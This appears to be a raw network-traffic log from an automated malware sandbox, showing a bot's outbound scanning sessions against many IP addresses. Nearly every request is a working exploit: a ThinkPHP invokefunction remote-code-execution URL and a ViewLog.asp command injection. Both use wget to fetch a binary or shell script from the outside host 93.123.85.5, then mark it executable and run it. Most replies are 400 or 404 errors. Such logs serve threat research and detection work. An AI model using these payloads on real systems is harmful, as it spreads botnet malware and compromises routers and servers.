                                                              Nov 13, 2023 22:20:17.155575037 CET17031OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:17.570770979 CET17043INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 214
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 31 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-17</center><hr><center>nginx</center></body></html>
                                                              Nov 13, 2023 22:20:21.609879971 CET17555INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 214
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 31 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-17</center><hr><center>nginx</center></body></html>
                                                              Nov 13, 2023 22:20:27.817198038 CET18378INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 214
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 31 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-17</center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              863192.168.2.235965031.136.19.2358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.669044018 CET16737OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.651722908 CET16800OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:17.635734081 CET17044OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.570959091 CET17553OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.505903959 CET18521OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:45.375761032 CET20422OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:16.859649897 CET20711OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              864192.168.2.235344094.121.153.348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.682252884 CET16760OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              865192.168.2.235184831.200.119.2148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.683372021 CET16761OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              866192.168.2.235341431.200.0.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.685570002 CET16762OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              867192.168.2.234283031.173.69.2118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:14.708764076 CET16763OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.101905107 CET16791INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: ru
                                                              Content-Length: 1117
                                                              Date: Mon, 13 Nov 2023 21:20:16 GMT
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.20</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              868192.168.2.234367285.122.219.2468080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:15.223637104 CET16794OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              869192.168.2.235203231.206.223.828080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:15.461682081 CET16798OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.837157011 CET16833INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:20:15 GMT
                                                              Connection: Close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              87192.168.2.235639688.117.153.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:22.267153025 CET2824OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:22.588627100 CET2832INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:18 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              870192.168.2.2334240112.15.125.1680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:15.938072920 CET16895OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.467603922 CET16917OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.881714106 CET16956INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 214
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 64 78 2d 6c 74 2d 79 64 2d 7a 68 65 6a 69 61 6e 67 2d 68 75 7a 68 6f 75 2d 33 2d 31 38 33 2d 31 33 31 2d 31 38 31 2d 31 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>dx-lt-yd-zhejiang-huzhou-3-183-131-181-17</center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              871192.168.2.233291688.221.31.18780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:16.177946091 CET16910OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:16.520665884 CET16919INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
